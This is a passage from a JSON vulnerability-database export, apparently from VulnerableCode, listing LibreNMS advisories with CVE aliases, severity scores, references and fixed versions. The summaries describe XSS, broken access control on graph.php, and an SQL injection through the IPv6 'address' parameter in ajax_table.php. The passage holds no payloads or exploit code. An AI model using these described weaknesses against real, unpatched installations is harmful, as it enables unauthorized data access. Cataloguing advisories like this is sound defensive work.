},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-kn2w-mmss-s7hu"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-n5u3-c21p-ukas"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-nyn8-7mkk-zbb3"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-qqnn-43db-guek"},{"vulnerability":"VCID-sa1y-ej2a-fba9"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u1km-tzd2-5bhq"},{"vulnerability":"VCID-us6w-wwkm-dqc5"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-w5dm-5pyj-cfef"},{"vulnerability":"VCID-w9mu-bbkx-sbeq"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-x1aq-5a19-yye7"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-y6jm-2987-9uh2"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"},{"vulnerability":"VCID-zech-eg55-gbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@22.2.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539238?format=json","purl":"pkg:composer/librenms/librenms@201609","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@201609"}],"aliases":["CVE-2022-0588","GHSA-254q-rqmw-vx45"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wkt4-vdr8-mkgk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/110285?format=json","vulnerability_id":"VCID-x1aq-5a19-yye7","summary":"Cross-site Scripting in librenms/librenms\nCross-site Scripting (XSS) - Generic in GitHub repository librenms/librenms prior to 22.10.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-4069","reference_id":"","reference_type":"","scores":[{"value":"0.63094","scoring_system":"epss","scoring_elements":"0.9842","published_at":"2026-06-08T12:55:00Z"},{"value":"0.63094","scoring_system":"epss","scoring_elements":"0.98418","published_at":"2026-06-09T12:55:00Z"},{"value":"0.63094","scoring_system":"epss","scoring_elements":"0.98417","published_at":"2026-06-04T12:55:00Z"},{"value":"0.63094","scoring_system":"epss","scoring_elements":"0.98421","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-4069"},{"reference_url":"https://github.com/librenms/librenms/commit/8383376f1355812e09ec0c2af67f6d46891b7ba7","reference_id":"","reference_type":"","scores":[{"value":"3.4","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:N/A:N"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-24T20:10:44Z/"}],"url":"https://github.com/librenms/librenms/commit/8383376f1355812e09ec0c2af67f6d46891b7ba7"},{"reference_url":"https://huntr.dev/bounties/a9925d98-dac4-4c3c-835a-d93aeecfb2c5","reference_id":"","reference_type":"","scores":[{"value":"3.4","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:N/A:N"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-24T20:10:44Z/"}],"url":"https://huntr.dev/bounties/a9925d98-dac4-4c3c-835a-d93aeecfb2c5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-4069","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-4069"},{"reference_url":"https://github.com/advisories/GHSA-p55m-g4m3-qmrp","reference_id":"GHSA-p55m-g4m3-qmrp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p55m-g4m3-qmrp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/148559?format=json","purl":"pkg:composer/librenms/librenms@22.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2ccw-938t-yyaj"},{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-n5u3-c21p-ukas"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-nyn8-7mkk-zbb3"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-sa1y-ej2a-fba9"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u1km-tzd2-5bhq"},{"vulnerability":"VCID-us6w-wwkm-dqc5"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-w9mu-bbkx-sbeq"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@22.10.0"}],"aliases":["CVE-2022-4069","GHSA-p55m-g4m3-qmrp"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x1aq-5a19-yye7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/46434?format=json","vulnerability_id":"VCID-y3qu-d719-jff6","summary":"LibreNMS has Broken Access control on Graphs Feature\nLibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring which includes support for a wide range of network hardware and operating systems. In affected versions of LibreNMS when a user accesses their device dashboard, one request is sent to `graph.php` to access graphs generated on the particular Device. This request can be accessed by a low privilege user and they can enumerate devices on librenms with their id or hostname. Leveraging this vulnerability a low privilege user can see all devices registered by admin users. This vulnerability has been addressed in commit `489978a923` which has been included in release version 23.11.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-48294","reference_id":"","reference_type":"","scores":[{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.06904","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.06873","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.06866","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.06918","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.06914","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-48294"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/blob/fa93034edd40c130c2ff00667ca2498d84be6e69/html/graph.php#L19C1-L25C2","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/blob/fa93034edd40c130c2ff00667ca2498d84be6e69/html/graph.php#L19C1-L25C2"},{"reference_url":"https://github.com/librenms/librenms/commit/489978a923ed52aa243d3419889ca298a8a6a7cf","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/commit/489978a923ed52aa243d3419889ca298a8a6a7cf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-48294","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-48294"},{"reference_url":"https://github.com/advisories/GHSA-fpq5-4vwm-78x4","reference_id":"GHSA-fpq5-4vwm-78x4","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fpq5-4vwm-78x4"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-fpq5-4vwm-78x4","reference_id":"GHSA-fpq5-4vwm-78x4","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-fpq5-4vwm-78x4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67799?format=json","purl":"pkg:composer/librenms/librenms@23.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@23.11.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539238?format=json","purl":"pkg:composer/librenms/librenms@201609","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@201609"}],"aliases":["CVE-2023-48294","GHSA-fpq5-4vwm-78x4"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y3qu-d719-jff6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50197?format=json","vulnerability_id":"VCID-y5mq-m57f-b3bx","summary":"LibreNMS: SQL Injection in ajax_table.php spreads through a covert data stream.\n*SQL Injection in IPv6 Address Search functionality via `address` parameter**\n\nA SQL injection vulnerability exists in the `ajax_table.php` endpoint. The application fails to properly sanitize or parameterize user input when processing IPv6 address searches. Specifically, the `address` parameter is split into an address and a prefix, and the prefix portion is directly concatenated into the SQL query string without validation. This allows an attacker to inject arbitrary SQL commands, potentially leading to unauthorized data access or database manipulation.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26988","reference_id":"","reference_type":"","scores":[{"value":"1e-05","scoring_system":"epss","scoring_elements":"4e-05","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26988"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/15429580baba03ed1dd377bada1bde4b7a1175a1","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-20T15:31:39Z/"}],"url":"https://github.com/librenms/librenms/commit/15429580baba03ed1dd377bada1bde4b7a1175a1"},{"reference_url":"https://github.com/librenms/librenms/pull/18777","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-20T15:31:39Z/"}],"url":"https://github.com/librenms/librenms/pull/18777"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26988","reference_id":"CVE-2026-26988","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26988"},{"reference_url":"https://github.com/advisories/GHSA-h3rv-q4rq-pqcv","reference_id":"GHSA-h3rv-q4rq-pqcv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h3rv-q4rq-pqcv"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-h3rv-q4rq-pqcv","reference_id":"GHSA-h3rv-q4rq-pqcv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-20T15:31:39Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-h3rv-q4rq-pqcv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74102?format=json","purl":"pkg:composer/librenms/librenms@26.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@26.2.0"}],"aliases":["CVE-2026-26988","GHSA-h3rv-q4rq-pqcv"],"risk_score":4.2,"exploitability":"0.5","weighted_severity":"8.4","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y5mq-m57f-b3bx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/110184?format=json","vulnerability_id":"VCID-y6jm-2987-9uh2","summary":"Cross-site Scripting in librenms/librenms\nCross-site Scripting (XSS) - Stored in GitHub repository librenms/librenms prior to 22.10.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-3562","reference_id":"","reference_type":"","scores":[{"value":"0.85742","scoring_system":"epss","scoring_elements":"0.99395","published_at":"2026-06-05T12:55:00Z"},{"value":"0.85742","scoring_system":"epss","scoring_elements":"0.99394","published_at":"2026-06-04T12:55:00Z"},{"value":"0.86005","scoring_system":"epss","scoring_elements":"0.99409","published_at":"2026-06-09T12:55:00Z"},{"value":"0.86005","scoring_system":"epss","scoring_elements":"0.99408","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-3562"},{"reference_url":"https://github.com/librenms/librenms/commit/43cb72549d90e338f902b359a83c23d3cb5a2645","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-28T18:08:34Z/"}],"url":"https://github.com/librenms/librenms/commit/43cb72549d90e338f902b359a83c23d3cb5a2645"},{"reference_url":"https://huntr.dev/bounties/bb9f76db-1314-44ae-9ccc-2b69679aa657","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-28T18:08:34Z/"}],"url":"https://huntr.dev/bounties/bb9f76db-1314-44ae-9ccc-2b69679aa657"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3562","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3562"},{"reference_url":"https://github.com/advisories/GHSA-5h77-4245-pg5p","reference_id":"GHSA-5h77-4245-pg5p","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5h77-4245-pg5p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/148559?format=json","purl":"pkg:composer/librenms/librenms@22.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2ccw-938t-yyaj"},{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-n5u3-c21p-ukas"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-nyn8-7mkk-zbb3"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-sa1y-ej2a-fba9"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u1km-tzd2-5bhq"},{"vulnerability":"VCID-us6w-wwkm-dqc5"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-w9mu-bbkx-sbeq"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@22.10.0"}],"aliases":["CVE-2022-3562","GHSA-5h77-4245-pg5p"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y6jm-2987-9uh2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56484?format=json","vulnerability_id":"VCID-yhmt-yukb-kuge","summary":"Duplicate\nThis advisory duplicates another.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-23201","reference_id":"","reference_type":"","scores":[{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.07518","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.07525","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10411","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10472","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10388","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-23201"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-23201","reference_id":"CVE-2025-23201","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-23201"},{"reference_url":"https://github.com/advisories/GHSA-g84x-g96g-rcjc","reference_id":"GHSA-g84x-g96g-rcjc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g84x-g96g-rcjc"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-g84x-g96g-rcjc","reference_id":"GHSA-g84x-g96g-rcjc","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-17T15:01:5